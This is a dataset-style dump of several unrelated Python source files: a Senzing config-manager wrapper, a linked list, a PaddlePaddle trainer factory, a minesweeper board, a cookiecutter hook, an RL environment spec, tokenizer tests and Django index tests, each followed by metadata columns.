self._lib_handle.G2ConfigMgr_getLastException.argtypes = [c_char_p, c_size_t]
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf,sizeof(tls_var.buf))
resultString = tls_var.buf.value.decode('utf-8')
return resultString
def getLastExceptionCode(self):
""" Gets the last exception code
"""
self._lib_handle.G2ConfigMgr_getLastExceptionCode.restype = c_int
self._lib_handle.G2ConfigMgr_getLastExceptionCode.argtypes = []
exception_code = self._lib_handle.G2ConfigMgr_getLastExceptionCode()
return exception_code
def destroy(self):
""" Uninitializes the engine
This should be done once per process after init(...) is called.
After it is called the engine will no longer function.
Args:
Return:
None
"""
self._lib_handle.G2ConfigMgr_destroy()
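# Illustrative driver for the class above.  The module name and the INI JSON
# are assumptions; a real deployment supplies its own Senzing engine settings.
if __name__ == "__main__":
    ini_params = json.dumps({"PIPELINE": {"CONFIGPATH": "/etc/opt/senzing"}})  # assumed settings
    config_mgr = G2ConfigMgr()
    config_mgr.initV2("example-config-mgr", ini_params)
    default_id = bytearray()
    config_mgr.getDefaultConfigID(default_id)
    if default_id:
        config_doc = bytearray()
        config_mgr.getConfig(default_id.decode(), config_doc)
        arcpy.AddMessage("default config id: {}".format(default_id.decode()))
    config_mgr.destroy()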
| senzing/g2/sdk/python/G2ConfigMgr.py | 12,527 | G2 config-manager module access library
Attributes:
_lib_handle: A boolean indicating if we like SPAM or not.
_resize_func_def: resize function definiton
_resize_func: resize function pointer
_module_name: CME module name
_ini_params: a JSON string containing INI parameters
Class initialization
registers a new configuration document in the datastore
Clears the last exception
Uninitializes the engine
This should be done once per process after init(...) is called.
After it is called the engine will no longer function.
Args:
Return:
None
retrieves the registered configuration document from the datastore
retrieves a list of known configurations from the datastore
gets the default config identifier from the datastore
Gets the last exception
Gets the last exception code
Initializes the G2 config manager
This should only be called once per process.
Args:
moduleName: A short name given to this instance of the config module
iniParams: A json document that contains G2 system parameters.
verboseLogging: Enable diagnostic logging which will arcpy.AddMessage a massive amount of information to stdout
Internal processing function
Internal processing function
sets the default config identifier in the datastore
callback function that resizes return buffer when it is too small
Args:
size_: size the return buffer needs to be
sets the default config identifier in the datastore
arcpy.AddMessage("Created new Buffer {}".format(self.buf))arcpy.AddMessage("New RESIZE_RETURN_BUF {}:{}".format(buf_,size_))arcpy.AddMessage("RESIZE_RETURN_BUF {}:{}/{}".format(buf_,size_,tls_var.bufSize))arcpy.AddMessage("AttributeError RESIZE_RETURN_BUF {}:{}".format(buf_,size_))arcpy.AddMessage("Created new Buffer {}".format(tls_var.buf)) type: () -> None type: (str) -> strhandle null stringif string is unicode, transcode to utf-8 strif input is bytearray, assumt utf-8 and convert to strinput is already a str type: (str) -> inthandle null stringif string is unicode, transcode to utf-8 strif input is bytearray, assumt utf-8 and convert to strinput is already an intAdd the bytes to the response bytearray from calling functionAdd the bytes to the response bytearray from calling function | 2,309 | en | 0.520907 |
class Node:
""" A singly-linked node. """
def __init__(self, data=None):
self.data = data
self.next = None
class SinglyLinkedList:
def __init__ (self):
self.tail = None
self.head = None
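        # Note: in this implementation `tail` points at the FIRST node and
        # `head` at the LAST node appended.  Keeping a reference to the last
        # node is what makes append() O(1): no traversal is needed to find
        # the insertion point, unlike a naive singly linked list.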
def append(self, data):
node = Node(data)
if self.head:
self.head.next = node
self.head = node
else:
self.tail = node
self.head = node
words = SinglyLinkedList()
words.append('egg')
words.append('ham')
words.append('spam')
current = words.tail
while current:
print(current.data)
current = current.next
| Chapter04/faster_append_singly_linked_list.py | 652 | A singly-linked node. | 21 | en | 0.25106 |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of TrainerFactory."""
import threading
import time
import logging
import numpy as np
from paddle.fluid.log_helper import get_logger
local_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
from .trainer_desc import MultiTrainer, DistMultiTrainer, PipelineTrainer, HeterXpuTrainer, PSGPUTrainer
from .device_worker import Hogwild, DownpourSGD, Section, DownpourSGDOPT
from .framework import Variable
from multiprocessing import Process, Manager
__all__ = ["TrainerFactory", "FetchHandlerMonitor"]
class TrainerFactory(object):
"""
Create trainer and device worker.
If opt_info is not None, it will get configs from opt_info,
otherwise create MultiTrainer and Hogwild.
"""
def __init__(self):
pass
def _create_trainer(self, opt_info=None):
trainer = None
device_worker = None
if not opt_info:
# default is MultiTrainer + Hogwild
trainer = MultiTrainer()
device_worker = Hogwild()
trainer._set_device_worker(device_worker)
else:
trainer_class = opt_info.get("trainer", "MultiTrainer")
device_worker_class = opt_info.get("device_worker", "Hogwild")
trainer = globals()[trainer_class]()
device_worker = globals()[device_worker_class]()
# for debug tools
if opt_info is not None:
if opt_info.get("dump_slot") is not None:
trainer._set_dump_slot(opt_info["dump_slot"])
if opt_info.get("mpi_rank") is not None:
trainer._set_mpi_rank(opt_info["mpi_rank"])
if opt_info.get("mpi_size") is not None:
trainer._set_mpi_size(opt_info["mpi_size"])
if opt_info.get("dump_fields") is not None and len(
opt_info.get("dump_fields")) != 0:
trainer._set_dump_fields(opt_info["dump_fields"])
if opt_info.get("dump_fields_path") is not None and len(
opt_info.get("dump_fields_path")) != 0:
trainer._set_dump_fields_path(opt_info["dump_fields_path"])
if opt_info.get("dump_file_num") is not None:
trainer._set_dump_file_num(opt_info["dump_file_num"])
if opt_info.get("dump_converter") is not None:
trainer._set_dump_converter(opt_info["dump_converter"])
if opt_info.get("dump_param") is not None and len(
opt_info.get("dump_param")) != 0:
trainer._set_dump_param(opt_info["dump_param"])
if opt_info.get("worker_places") is not None:
trainer._set_worker_places(opt_info["worker_places"])
if opt_info.get("use_ps_gpu") is not None:
trainer._set_use_ps_gpu(opt_info["use_ps_gpu"])
if opt_info.get("enable_random_dump") is not None:
trainer._set_enable_random_dump(opt_info[
"enable_random_dump"])
if opt_info.get("dump_interval") is not None:
trainer._set_dump_interval(opt_info["dump_interval"])
if opt_info.get("random_with_lineid") is not None:
trainer._set_random_with_lineid(opt_info[
"random_with_lineid"])
if "fleet_desc" in opt_info:
device_worker._set_fleet_desc(opt_info["fleet_desc"])
trainer._set_fleet_desc(opt_info["fleet_desc"])
if opt_info.get("use_cvm") is not None:
trainer._set_use_cvm(opt_info["use_cvm"])
if opt_info.get("no_cvm") is not None:
trainer._set_no_cvm(opt_info["no_cvm"])
if opt_info.get("scale_datanorm") is not None:
trainer._set_scale_datanorm(opt_info["scale_datanorm"])
if opt_info.get("adjust_ins_weight") is not None:
trainer._set_adjust_ins_weight(opt_info[
"adjust_ins_weight"])
if opt_info.get("copy_table") is not None:
trainer._set_copy_table_config(opt_info["copy_table"])
if opt_info.get("check_nan_var_names") is not None:
trainer._set_check_nan_var_names(opt_info[
"check_nan_var_names"])
if opt_info.get("loss_names") is not None:
trainer._set_loss_names(opt_info["loss_names"])
trainer._set_device_worker(device_worker)
return trainer
class FetchHandlerMonitor(object):
"""
    Definition of FetchHandlerMonitor class,
it's for fetch handler.
"""
def __init__(self, scope, handler):
self.fetch_instance = handler
self.fetch_thread = threading.Thread(
target=self.handler_launch_func, args=(scope, self.fetch_instance))
self.running_lock = threading.Lock()
self.running = False
def handler_launch_func(self, scope, handler):
fetch_instance = handler
period_secs = fetch_instance.period_secs
var_name_to_key = {}
for key in fetch_instance.var_dict:
if isinstance(fetch_instance.var_dict[key], Variable):
var_name_to_key[fetch_instance.var_dict[key].name] = key
else:
local_logger.warning("the value of {} is not a Variable".format(
key))
var_name_to_key["None.var"] = key
elapsed_secs = 0
while True:
self.running_lock.acquire()
if self.running == False:
break
if elapsed_secs < period_secs:
# TODO(guru4elephant): needs customized condition
time.sleep(1)
elapsed_secs += 1
else:
elapsed_secs = 0
fetch_dict = {}
for key in var_name_to_key:
var = scope.find_var(key)
fetch_dict[key] = var
if var == None:
local_logger.warning("{} value currently not available".
format(var_name_to_key[key]))
res_dict = {}
for key in fetch_dict:
user_name = var_name_to_key[key]
if fetch_dict[key] == None:
res_dict[user_name] = None
continue
else:
res_dict[user_name] = fetch_dict[key].get_tensor()
lod = res_dict[user_name].lod()
if len(lod) > 0:
raise RuntimeError("Some of your fetched tensors \
hold LoD information. \
They can not be completely cast \
to Python ndarray. We can \
not return LoDTensor itself directly, \
please choose another targets")
if res_dict[user_name]._is_initialized():
res_dict[user_name] = np.array(res_dict[user_name])
else:
res_dict[user_name] = None
fetch_instance.handler(res_dict)
self.running_lock.release()
def start(self):
"""
start monitor,
it will start a monitor thread.
"""
self.running_lock.acquire()
self.running = True
self.running_lock.release()
self.fetch_thread.setDaemon(True)
self.fetch_thread.start()
def stop(self):
self.running_lock.acquire()
self.running = False
self.running_lock.release()
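# Illustrative sketch only: with no opt_info, _create_trainer() falls back to
# MultiTrainer + Hogwild, mirroring the default branch at the top of that method.
if __name__ == "__main__":
    default_trainer = TrainerFactory()._create_trainer(None)
    local_logger.info("default trainer: %s", type(default_trainer).__name__)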
| python/paddle/fluid/trainer_factory.py | 8,539 | Defination of FetchHandlerMonitor class,
it's for fetch handler.
Create trainer and device worker.
If opt_info is not None, it will get configs from opt_info,
otherwise create MultiTrainer and Hogwild.
start monitor,
it will start a monitor thread.
Defination of TrainerFactory.
Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. default is MultiTrainer + Hogwild for debug tools TODO(guru4elephant): needs customized condition | 964 | en | 0.814831 |
# https://en.m.wikipedia.org/wiki/Box_Drawing
from random import randrange
class Board:
    # update_board() is the main entry point used outside this class; a game
    # loop also calls find_valid_starting_mine_board(), check_winning() and reveal_board().
def __init__(self, size, mine_numbers):
self.size = size
self.default_content = " ◌ "
self.board_data = self.create_board(self.size)
self.mine_numbers = mine_numbers
def create_board(self, size):
return [[self.default_content for x in range(self.size)] for y in range(self.size)]
def internal_board(self):
internal_board = ""
for x in range(len(self.board_data)):
drawn_line = ""
for y in range(len(self.board_data)):
drawn_line += self.board_data[x][y]
if y != len(self.board_data) - 1:
drawn_line += "│"
internal_board += drawn_line + "\n"
if x < len(self.board_data) - 1:
internal_board += "───┼" * \
(len(self.board_data) - 1) + "───" + "\n"
return internal_board
def draw_board(self):
internal_board = self.internal_board()
drawn_board = ""
        # drawing the border around the internal board
internal_board = internal_board.split("\n")
drawn_board += "╔═══" + "╤═══" * (self.size - 1) + "╗" + "\n"
for x in range(0, self.size * 2, 2):
drawn_board += "║" + \
internal_board[x] + "║" + f" :{int(x/2 +1)}" + "\n"
if x != (self.size * 2) - 2:
drawn_board += "╟" + internal_board[x + 1] + "╢" + "\n"
drawn_board += "╚═══" + "╧═══" * (self.size - 1) + "╝" + "\n"
for x in range(self.size):
number = x + 1
if number < 10:
drawn_board += f" {number} "
else:
drawn_board += f" {number}"
return drawn_board
def generate_mines(self):
mine_list = []
while len(mine_list) < self.mine_numbers:
x = randrange(self.size)
y = randrange(self.size)
if (x, y) not in mine_list:
mine_list.append((x, y))
return mine_list
def generate_mine_board(self):
mine_list = self.generate_mines()
mine_board = ([[0 for y in range(self.size)] for x in range(self.size)])
for mine in mine_list:
            #add a mine to the mine position, and add 1 to all adjacent spots
x = mine[0]
y = mine[1]
mine_board[y][x] = "◉" # negative = mine
for x_ in range(x - 1, x + 2):
for y_ in range(y - 1, y + 2):
if 0 <= x_ < self.size and 0 <= y_ < self.size and mine_board[y_][x_] != "◉":
mine_board[y_][x_] += 1
return mine_board
def find_valid_starting_mine_board(self, x, y):
        #making sure the first x,y input lands on an empty (zero) cell
mine_board_candidate = []
while True:
mine_board_candidate = self.generate_mine_board()
if mine_board_candidate[y - 1][x - 1] == 0:
print(mine_board_candidate)
break
self.mine_board = mine_board_candidate
def flood_fill(self, x, y):
if self.board_data[y][x] == " ◌ " and self.mine_board[y][x] == "◉":
raise Exception("the flood fill algo hit a mine, but it shouldn't because it will stop when it hits a number.")
elif self.board_data[y][x] == " ◌ " and self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
elif self.board_data[y][x] == " ◌ " and self.mine_board[y][x] == 0:
self.board_data[y][x] = " "
for x_ in range(x - 1, x + 2):
for y_ in range(y - 1, y + 2):
if 0 <= x_ < self.size and 0 <= y_ < self.size:
self.flood_fill(x_, y_)
def reveal_board(self):
for x in range(self.size):
for y in range(self.size):
if self.board_data[y][x] in [" ◌ ", " ▶ "]:
if self.mine_board[y][x] == "◉":
self.board_data[y][x] = " ◉ "
elif self.mine_board[y][x] == 0:
self.board_data[y][x] = " "
elif self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
return self.draw_board()
def check_winning(self):
flag = True
for x in range(self.size):
for y in range(self.size):
if self.board_data[y][x] == " ◌ " and self.mine_board[y][x] != "◉":
flag = False
return flag
def update_board(self, position, flag=False):
"""Takes position [x,y] as input
        returns an updated board as a string
"""
x = position[0] - 1
y = position[1] - 1
if flag == True:
if self.board_data[y][x] == " ◌ ":
self.board_data[y][x] = " ▶ "
elif self.board_data[y][x] == " ▶ ":
self.board_data[y][x] = " ◌ "
return self.draw_board()
if self.mine_board[y][x] == "◉":
self.board_data[y][x] = " ◉ "
return False
elif isinstance(self.mine_board[y][x], int) and self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
else:
self.flood_fill(x, y)
return self.draw_board()
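# Minimal usage sketch (an assumption, not part of the original file): it
# assumes a 9x9 board with 10 mines and a first click on cell (5, 5), which
# find_valid_starting_mine_board() guarantees is safe.
if __name__ == "__main__":
    board = Board(size=9, mine_numbers=10)
    board.find_valid_starting_mine_board(5, 5)    # re-rolls mines until (5, 5) is empty
    print(board.update_board([5, 5]))             # reveal the starting cell
    print(board.update_board([1, 1], flag=True))  # toggle a flag on another cell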
| board.py | 4,601 | Takes position [x,y] as input
returns a updated board as a string
https://en.m.wikipedia.org/wiki/Box_Drawing you only need to use update_board() outside this class. drawing the boarder around the internal boardadd a mine to the mine position, and add 1 to all adjecent spots negative = minemaking shure the first x,y input fits | 330 | en | 0.789235 |
"""Post gen hook to ensure that the generated project
has only one package management, either pipenv or pip."""
import logging
import os
import shutil
import sys
_logger = logging.getLogger()
def clean_extra_package_management_files():
"""Removes either requirements files and folder or the Pipfile."""
use_pipenv = "{{cookiecutter.use_pipenv}}"
use_heroku = "{{cookiecutter.use_heroku}}"
to_delete = []
if use_pipenv == "yes":
to_delete = to_delete + ["requirements.txt", "requirements"]
else:
to_delete.append("Pipfile")
if use_heroku == "no":
to_delete = to_delete + ["Procfile", "app.json"]
try:
for file_or_dir in to_delete:
if os.path.isfile(file_or_dir):
os.remove(file_or_dir)
else:
shutil.rmtree(file_or_dir)
shutil.copy(".env.example", ".env")
open("dev.db", 'a').close()
except OSError as e:
_logger.warning("While attempting to remove file(s) an error occurred")
_logger.warning(f"Error: {e}")
sys.exit(1)
if __name__ == "__main__":
clean_extra_package_management_files()
| hooks/post_gen_project.py | 1,160 | Removes either requirements files and folder or the Pipfile.
Post gen hook to ensure that the generated project
has only one package management, either pipenv or pip. | 166 | en | 0.875291 |
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for environment interface with agent / tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange
class spaces(object):
discrete = 0
box = 1
def get_space(space):
if hasattr(space, 'n'):
return space.n, spaces.discrete, None
elif hasattr(space, 'shape'):
return np.prod(space.shape), spaces.box, (space.low, space.high)
def get_spaces(spaces):
if hasattr(spaces, 'spaces'):
return zip(*[get_space(space) for space in spaces.spaces])
else:
return [(ret,) for ret in get_space(spaces)]
class EnvSpec(object):
def __init__(self, env, try_combining_actions=True,
discretize_actions=None):
self.discretize_actions = discretize_actions
# figure out observation space
self.obs_space = env.observation_space
self.obs_dims, self.obs_types, self.obs_info = get_spaces(self.obs_space)
# figure out action space
self.act_space = env.action_space
self.act_dims, self.act_types, self.act_info = get_spaces(self.act_space)
if self.discretize_actions:
self._act_dims = self.act_dims[:]
self._act_types = self.act_types[:]
self.act_dims = []
self.act_types = []
for i, (dim, typ) in enumerate(zip(self._act_dims, self._act_types)):
if typ == spaces.discrete:
self.act_dims.append(dim)
self.act_types.append(spaces.discrete)
elif typ == spaces.box:
for _ in xrange(dim):
self.act_dims.append(self.discretize_actions)
self.act_types.append(spaces.discrete)
else:
self._act_dims = None
self._act_types = None
if (try_combining_actions and
all(typ == spaces.discrete for typ in self.act_types)):
self.combine_actions = True
self.orig_act_dims = self.act_dims[:]
self.orig_act_types = self.act_types[:]
total_act_dim = 1
for dim in self.act_dims:
total_act_dim *= dim
self.act_dims = [total_act_dim]
self.act_types = [spaces.discrete]
else:
self.combine_actions = False
self.obs_dims_and_types = list(zip(self.obs_dims, self.obs_types))
self.act_dims_and_types = list(zip(self.act_dims, self.act_types))
self.total_obs_dim = sum(self.obs_dims)
self.total_sampling_act_dim = sum(self.sampling_dim(dim, typ)
for dim, typ in self.act_dims_and_types)
self.total_sampled_act_dim = sum(self.act_dims)
def sampling_dim(self, dim, typ):
if typ == spaces.discrete:
return dim
elif typ == spaces.box:
return 2 * dim # Gaussian mean and std
else:
assert False
def convert_actions_to_env(self, actions):
if self.combine_actions:
new_actions = []
actions = actions[0]
for dim in self.orig_act_dims:
new_actions.append(np.mod(actions, dim))
actions = (actions / dim).astype('int32')
actions = new_actions
if self.discretize_actions:
new_actions = []
idx = 0
for i, (dim, typ) in enumerate(zip(self._act_dims, self._act_types)):
if typ == spaces.discrete:
new_actions.append(actions[idx])
idx += 1
elif typ == spaces.box:
low, high = self.act_info[i]
cur_action = []
for j in xrange(dim):
cur_action.append(
low[j] + (high[j] - low[j]) * actions[idx] /
float(self.discretize_actions))
idx += 1
new_actions.append(np.hstack(cur_action))
actions = new_actions
return actions
def convert_env_actions_to_actions(self, actions):
if not self.combine_actions:
return actions
new_actions = 0
base = 1
for act, dim in zip(actions, self.orig_act_dims):
new_actions = new_actions + base * act
base *= dim
return [new_actions]
def convert_obs_to_list(self, obs):
if len(self.obs_dims) == 1:
return [obs]
else:
return list(obs)
def convert_action_to_gym(self, action):
if len(action) == 1:
return action[0]
else:
return list(action)
if ((not self.combine_actions or len(self.orig_act_dims) == 1) and
(len(self.act_dims) == 1 or
(self.discretize_actions and len(self._act_dims) == 1))):
return action[0]
else:
return list(action)
def initial_obs(self, batch_size):
batched = batch_size is not None
batch_size = batch_size or 1
obs = []
for dim, typ in self.obs_dims_and_types:
if typ == spaces.discrete:
obs.append(np.zeros(batch_size))
elif typ == spaces.box:
obs.append(np.zeros([batch_size, dim]))
if batched:
return obs
else:
return zip(*obs)[0]
def initial_act(self, batch_size=None):
batched = batch_size is not None
batch_size = batch_size or 1
act = []
for dim, typ in self.act_dims_and_types:
if typ == spaces.discrete:
act.append(-np.ones(batch_size))
elif typ == spaces.box:
act.append(-np.ones([batch_size, dim]))
if batched:
return act
else:
return zip(*act)[0]
def is_discrete(self, typ):
return typ == spaces.discrete
def is_box(self, typ):
return typ == spaces.box
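# Minimal usage sketch (an assumption, not part of the original file): any
# object exposing gym-style observation_space/action_space attributes works,
# so a tiny stand-in environment is enough to exercise EnvSpec.
if __name__ == '__main__':
  class _DiscreteSpace(object):
    def __init__(self, n):
      self.n = n

  class _FakeEnv(object):
    observation_space = _DiscreteSpace(4)
    action_space = _DiscreteSpace(2)

  spec = EnvSpec(_FakeEnv())
  print(spec.obs_dims_and_types)  # [(4, 0)] -> one discrete observation of size 4
  print(spec.act_dims_and_types)  # [(2, 0)] -> one discrete action of size 2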
| research/pcl_rl/env_spec.py | 6,009 | Utilities for environment interface with agent / tensorflow.
Copyright 2017 The TensorFlow Authors All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== figure out observation space figure out action space Gaussian mean and std | 797 | en | 0.83008 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-06-10 08:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data_exchange', '0004_auto_20180610_0833'),
]
operations = [
migrations.AlterField(
model_name='ontaskworkflow',
name='url',
field=models.URLField(blank=True, max_length=2048, null=True),
),
migrations.AlterField(
model_name='qualtricssurvey',
name='url',
field=models.URLField(blank=True, max_length=2048, null=True),
),
]
| mooclet_engine/data_exchange/migrations/0005_auto_20180610_0835.py | 669 | -*- coding: utf-8 -*- Generated by Django 1.11.7 on 2018-06-10 08:35 | 68 | en | 0.491555 |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import unittest
from transformers.file_utils import cached_property
from transformers.testing_utils import slow
from transformers.tokenization_fsmt import VOCAB_FILES_NAMES, FSMTTokenizer
from .test_tokenization_common import TokenizerTesterMixin
# using a different tiny model than the one used for default params defined in init to ensure proper testing
FSMT_TINY2 = "stas/tiny-wmt19-en-ru"
class FSMTTokenizationTest(TokenizerTesterMixin, unittest.TestCase):
tokenizer_class = FSMTTokenizer
def setUp(self):
super().setUp()
# Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt
vocab = [
"l",
"o",
"w",
"e",
"r",
"s",
"t",
"i",
"d",
"n",
"w</w>",
"r</w>",
"t</w>",
"lo",
"low",
"er</w>",
"low</w>",
"lowest</w>",
"newer</w>",
"wider</w>",
"<unk>",
]
vocab_tokens = dict(zip(vocab, range(len(vocab))))
merges = ["l o 123", "lo w 1456", "e r</w> 1789", ""]
self.langs = ["en", "ru"]
config = {
"langs": self.langs,
"src_vocab_size": 10,
"tgt_vocab_size": 20,
}
self.src_vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["src_vocab_file"])
self.tgt_vocab_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["tgt_vocab_file"])
config_file = os.path.join(self.tmpdirname, "tokenizer_config.json")
self.merges_file = os.path.join(self.tmpdirname, VOCAB_FILES_NAMES["merges_file"])
with open(self.src_vocab_file, "w") as fp:
fp.write(json.dumps(vocab_tokens))
with open(self.tgt_vocab_file, "w") as fp:
fp.write(json.dumps(vocab_tokens))
with open(self.merges_file, "w") as fp:
fp.write("\n".join(merges))
with open(config_file, "w") as fp:
fp.write(json.dumps(config))
@cached_property
def tokenizer_ru_en(self):
return FSMTTokenizer.from_pretrained("facebook/wmt19-ru-en")
@cached_property
def tokenizer_en_ru(self):
return FSMTTokenizer.from_pretrained("facebook/wmt19-en-ru")
def test_online_tokenizer_config(self):
"""this just tests that the online tokenizer files get correctly fetched and
        loaded via its tokenizer_config.json; it's not slow, so it's run by normal CI
"""
tokenizer = FSMTTokenizer.from_pretrained(FSMT_TINY2)
self.assertListEqual([tokenizer.src_lang, tokenizer.tgt_lang], ["en", "ru"])
self.assertEqual(tokenizer.src_vocab_size, 21)
self.assertEqual(tokenizer.tgt_vocab_size, 21)
def test_full_tokenizer(self):
""" Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt """
tokenizer = FSMTTokenizer(self.langs, self.src_vocab_file, self.tgt_vocab_file, self.merges_file)
text = "lower"
bpe_tokens = ["low", "er</w>"]
tokens = tokenizer.tokenize(text)
self.assertListEqual(tokens, bpe_tokens)
input_tokens = tokens + ["<unk>"]
input_bpe_tokens = [14, 15, 20]
self.assertListEqual(tokenizer.convert_tokens_to_ids(input_tokens), input_bpe_tokens)
@slow
def test_sequence_builders(self):
tokenizer = self.tokenizer_ru_en
text = tokenizer.encode("sequence builders", add_special_tokens=False)
text_2 = tokenizer.encode("multi-sequence build", add_special_tokens=False)
encoded_sentence = tokenizer.build_inputs_with_special_tokens(text)
encoded_pair = tokenizer.build_inputs_with_special_tokens(text, text_2)
assert encoded_sentence == text + [2]
assert encoded_pair == text + [2] + text_2 + [2]
@slow
def test_match_encode_decode(self):
tokenizer_enc = self.tokenizer_en_ru
tokenizer_dec = self.tokenizer_ru_en
targets = [
[
"Here's a little song I wrote. Don't worry, be happy.",
[2470, 39, 11, 2349, 7222, 70, 5979, 7, 8450, 1050, 13160, 5, 26, 6445, 7, 2],
],
["This is it. No more. I'm done!", [132, 21, 37, 7, 1434, 86, 7, 70, 6476, 1305, 427, 2]],
]
# if data needs to be recreated or added, run:
# import torch
# model = torch.hub.load("pytorch/fairseq", "transformer.wmt19.en-ru", checkpoint_file="model4.pt", tokenizer="moses", bpe="fastbpe")
# for src_text, _ in targets: print(f"""[\n"{src_text}",\n {model.encode(src_text).tolist()}\n],""")
for src_text, tgt_input_ids in targets:
encoded_ids = tokenizer_enc.encode(src_text, return_tensors=None)
self.assertListEqual(encoded_ids, tgt_input_ids)
# and decode backward, using the reversed languages model
decoded_text = tokenizer_dec.decode(encoded_ids, skip_special_tokens=True)
self.assertEqual(decoded_text, src_text)
@slow
def test_tokenizer_lower(self):
tokenizer = FSMTTokenizer.from_pretrained("facebook/wmt19-ru-en", do_lower_case=True)
tokens = tokenizer.tokenize("USA is United States of America")
expected = ["us", "a</w>", "is</w>", "un", "i", "ted</w>", "st", "ates</w>", "of</w>", "am", "er", "ica</w>"]
self.assertListEqual(tokens, expected)
@unittest.skip("FSMTConfig.__init__ requires non-optional args")
def test_torch_encode_plus_sent_to_model(self):
pass
@unittest.skip("FSMTConfig.__init__ requires non-optional args")
def test_np_encode_plus_sent_to_model(self):
pass
| tests/test_tokenization_fsmt.py | 6,396 | Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt
this just tests that the online tokenizer files get correctly fetched and
loaded via its tokenizer_config.json and it's not slow so it's run by normal CI
coding=utf-8 Copyright 2018 The Google AI Language Team Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. using a different tiny model than the one used for default params defined in init to ensure proper testing Adapted from Sennrich et al. 2015 and https://github.com/rsennrich/subword-nmt if data needs to be recreated or added, run: import torch model = torch.hub.load("pytorch/fairseq", "transformer.wmt19.en-ru", checkpoint_file="model4.pt", tokenizer="moses", bpe="fastbpe") for src_text, _ in targets: print(f"""[\n"{src_text}",\n {model.encode(src_text).tolist()}\n],""") and decode backward, using the reversed languages model | 1,353 | en | 0.791041 |
from django.db import models
from django.test import SimpleTestCase
from .models import Book, ChildModel1, ChildModel2
class IndexesTests(SimpleTestCase):
def test_suffix(self):
self.assertEqual(models.Index.suffix, 'idx')
def test_repr(self):
index = models.Index(fields=['title'])
multi_col_index = models.Index(fields=['title', 'author'])
self.assertEqual(repr(index), "<Index: fields='title'>")
self.assertEqual(repr(multi_col_index), "<Index: fields='title, author'>")
def test_eq(self):
index = models.Index(fields=['title'])
same_index = models.Index(fields=['title'])
another_index = models.Index(fields=['title', 'author'])
index.model = Book
same_index.model = Book
another_index.model = Book
self.assertEqual(index, same_index)
self.assertNotEqual(index, another_index)
def test_index_fields_type(self):
with self.assertRaisesMessage(ValueError, 'Index.fields must be a list.'):
models.Index(fields='title')
def test_raises_error_without_field(self):
msg = 'At least one field is required to define an index.'
with self.assertRaisesMessage(ValueError, msg):
models.Index()
def test_max_name_length(self):
msg = 'Index names cannot be longer than 30 characters.'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='looooooooooooong_index_name_idx')
def test_name_constraints(self):
msg = 'Index names cannot start with an underscore (_).'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='_name_starting_with_underscore')
msg = 'Index names cannot start with a number (0-9).'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='5name_starting_with_number')
def test_name_auto_generation(self):
index = models.Index(fields=['author'])
index.set_name_with_model(Book)
self.assertEqual(index.name, 'model_index_author_0f5565_idx')
# '-' for DESC columns should be accounted for in the index name.
index = models.Index(fields=['-author'])
index.set_name_with_model(Book)
self.assertEqual(index.name, 'model_index_author_708765_idx')
# fields may be truncated in the name. db_column is used for naming.
